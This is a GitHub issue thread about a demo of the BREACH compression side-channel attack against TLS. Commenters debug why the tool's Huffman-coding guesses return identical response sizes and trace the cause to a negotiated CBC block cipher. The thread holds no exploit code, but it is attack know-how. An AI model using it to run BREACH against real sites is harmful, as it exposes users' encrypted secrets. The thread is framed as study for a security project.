huffman coding check returning the same byte length #3
Comments
|
I noticed when I test in the browser it gets around 2584 bytes vs in the console it gets around 2922 bytes. This is quite a large difference. I wonder if I'm on to something. |
|
When decoding the response fro the request The reflected value becomes |
|
It seems after every request I always get the same byte response of 2906. I've adjusted the request url and the response bytes are the same. I'm thinking the calculation of the response bytes might be the issue. |
|
I'm wondering if it is negotiating a block cipher instead of a stream cipher and this is the cause of the same response length.. |
|
So, malbot.net is using a block cipher. It negotiates TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA. Which breaks this repo. |
|
It says in the README this doesn’t support block ciphers. |
|
@samrocketman That was the point of my comment. This is supposed to be a working demo with the website. I found out last night that getting a stream cipher to work is extremely difficult to get working because any newer operating system rejects it. I got around the block cipher but it's not that great of an implementation. If I come up with a decent solution I will try to make a pr. |
and others
I cloned the repo and ran it locally.
Issue 1: The target IP in the SSL proxy does not match malbot.net This was easy enough to update in the source code.
Issue 2: The part that deals with the huffman coding by making two requests, one with the character before the padding and the other with the character after the padding is getting the same response size. The code that deals with this is in BREACH Basic.cs at the method IsCorrectGuess.
I know gzip is working because the response comes back encoded. I decoded the response and checked the values and they are inserted into the page correctly.
I am trying to replicate this attack for a computer security project.
The text was updated successfully, but these errors were encountered: